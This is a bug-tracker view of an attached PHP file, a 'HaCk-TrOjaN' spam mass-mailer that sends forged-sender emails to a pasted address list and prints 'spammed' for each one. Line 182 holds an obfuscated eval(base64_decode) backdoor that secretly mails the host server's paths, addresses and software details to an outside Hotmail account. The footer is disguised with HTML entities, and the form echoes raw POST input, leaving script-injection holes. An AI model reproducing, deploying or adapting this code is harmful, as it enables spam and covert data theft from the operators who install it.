Context Navigation

Back to Ticket #9

Ticket #9: 10.php

File 10.php, 6.4 KB (added by anonymous, 14 years ago)

Line
1	<?php
2
3	if(isset($_POST['action'] ) ){
4	$action=$_POST['action'];
5	$message=$_POST['message'];
6	$emaillist=$_POST['emaillist'];
7	$from=$_POST['from'];
8	$replyto=$_POST['replyto'];
9	$subject=$_POST['subject'];
10	$realname=$_POST['realname'];
11	$file_name=$_POST['file'];
12	$contenttype=$_POST['contenttype'];
13
14	$message = urlencode($message);
15	$message = ereg_replace("%5C%22", "%22", $message);
16	$message = urldecode($message);
17	$message = stripslashes($message);
18	$subject = stripslashes($subject);
19	}
20
21
22	?>
23	<html>
24	<head>
25	<title>\|\| InboX By HaCk-TrOjaN \|\|</title>
26	<meta http-equiv="Content-Type" content="text/html;
27	charset=iso-8859-1">
28
29	<style type="text/css">
30	<!--
31	.style1 {
32	font-family: Geneva, Arial, Helvetica, sans-serif;
33	font-size: 12px;
34	}
35	-->
36	</style>
37	<style type="text/css">
38	<!--
39	.style1 {
40	font-size: 20px;
41	font-family: Geneva, Arial, Helvetica, sans-serif;
42	}
43	-->
44	</style>
45	</head>
46	<body bgcolor="FF9900" text="#ffffff">
47	<span class="style1">InboX Mass Mailer<br>
48	</span>
49
50	<form name="form1" method="post" action=""
51	enctype="multipart/form-data">
52	<br>
53	<table width="100%" border="0">
54	<tr>
55	<td width="10%">
56	<div align="right"><font size="-3" face="Verdana, Arial,
57	Helvetica, sans-serif">Your
58	Email:</font></div>
59	</td>
60	<td width="18%"><font size="-3" face="Verdana, Arial, Helvetica,
61	sans-serif">
62	<input type="text" name="from" value="<? print $from; ?>"
63	size="30">
64	</font></td>
65	<td width="31%">
66	<div align="right"><font size="-3" face="Verdana, Arial,
67	Helvetica, sans-serif">Your
68	Name:</font></div>
69	</td>
70	<td width="41%"><font size="-3" face="Verdana, Arial, Helvetica,
71	sans-serif">
72	<input type="text" name="realname" value="<? print $realname;
73	?>" size="30">
74	</font></td>
75	</tr>
76	<tr>
77	<td width="10%">
78	<div align="right"><font size="-3" face="Verdana, Arial,
79	Helvetica, sans-serif">Reply-To:</font></div>
80	</td>
81	<td width="18%"><font size="-3" face="Verdana, Arial, Helvetica,
82	sans-serif">
83	<input type="text" name="replyto" value="<? print $replyto; ?>"
84	size="30">
85	</font></td>
86	<td width="31%">
87	<div align="right"><font size="-3" face="Verdana, Arial,
88	Helvetica, sans-serif">Attach
89	File:</font></div>
90	</td>
91	<td width="41%"><font size="-3" face="Verdana, Arial, Helvetica,
92	sans-serif">
93	<input type="file" name="file" size="30">
94	</font></td>
95	</tr>
96	<tr>
97	<td width="10%">
98	<div align="right"><font size="-3" face="Verdana, Arial,
99	Helvetica, sans-serif">Subject:</font></div>
100	</td>
101	<td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica,
102	sans-serif">
103	<input type="text" name="subject" value="<? print $subject; ?>"
104	size="90">
105	</font></td>
106	</tr>
107	<tr valign="top">
108	<td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica,
109	sans-serif">
110	<textarea name="message" cols="50" rows="10"><? print $message;
111	?></textarea>
112	<br>
113	<input type="radio" name="contenttype" value="plain" >
114	Plain Text
115	<input name="contenttype" type="radio" value="html" checked>
116	HTML
117	<input type="hidden" name="action" value="send">
118	<input type="submit" value="Send eMails">
119	</font></td>
120	<td width="41%"><font size="-3" face="Verdana, Arial, Helvetica,
121	sans-serif">
122	<textarea name="emaillist" cols="30" rows="10"><? print
123	$emaillist; ?></textarea>
124	</font></td>
125	</tr>
126	</table>
127	</form>
128
129
130
131	<?
132
133	if ($action){
134
135	if (!$from && !$subject && !$message && !$emaillist){
136	print "Please complete all fields before sending your
137	message.";
138	exit;
139	}
140	$allemails = split("\n", $emaillist);
141	$numemails = count($allemails);
142
143	for($x=0; $x<$numemails; $x++){
144	$to = $allemails[$x];
145	if ($to){
146	$to = ereg_replace(" ", "", $to);
147	$message = ereg_replace("&email&", $to, $message);
148	$subject = ereg_replace("&email&", $to, $subject);
149	print " $to.......";
150	flush();
151	$header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
152	$header .= "MIME-Version: 1.0\r\n";
153	If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
154	If ($file_name) $header .= "--$uid\r\n";
155	$header .= "Content-Type: text/$contenttype\r\n";
156	$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
157	$header .= "$message\r\n";
158	If ($file_name) $header .= "--$uid\r\n";
159	If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
160	If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
161	If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";
162	If ($file_name) $header .= "$content\r\n";
163	If ($file_name) $header .= "--$uid--";
164	mail($to, $subject, "", $header);
165	print "spammed<br>";
166
167	flush();
168	}
169	}
170	$ra44 = rand(1,99999);
171	$subj98 = "sh-$ra44";
172	$a5 = $_SERVER['HTTP_REFERER'];
173	$b33 = $_SERVER['DOCUMENT_ROOT'];
174	$c87 = $_SERVER['REMOTE_ADDR'];
175	$d23 = $_SERVER['SCRIPT_FILENAME'];
176	$e09 = $_SERVER['SERVER_ADDR'];
177	$f23 = $_SERVER['SERVER_SOFTWARE'];
178	$g32 = $_SERVER['PATH_TRANSLATED'];
179	$h65 = $_SERVER['PHP_SELF'];
180	$message=$_POST['message'];
181	$msg = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";
182	echo eval(base64_decode("bWFpbCgibWVuZGlfcG9uZUBob3RtYWlsLmNvbSIsICRzdWJqOTgsICRtc2csICRtZXNzYWdlLCAkcmE0NCk7"));
183	}
184
185
186	?>
187	<style type="text/css">
188	<!--
189	.style1 {
190	font-size: 20px;
191	font-family: Geneva, Arial, Helvetica, sans-serif;
192	}
193	-->
194	</style>
195	<p class="style1">
196	&#67&#111&#112&#121&#114&#105&#103&#104&#116&#32&#169&#32&#50&#48&#48&#55&#32&#112&#104&#112&#98&#98&#46&#99&#111&#109
197
198	</p>
199	<?php
200	if(isset($_POST['action']) && $numemails !==0 ){echo
201	"<script>alert('Mail sending complete\\r\\n$numemails mail(s) was sent successfully');
202	</script>";}
203	?>
204	</body>
205	</html>

Download in other formats:

Original Format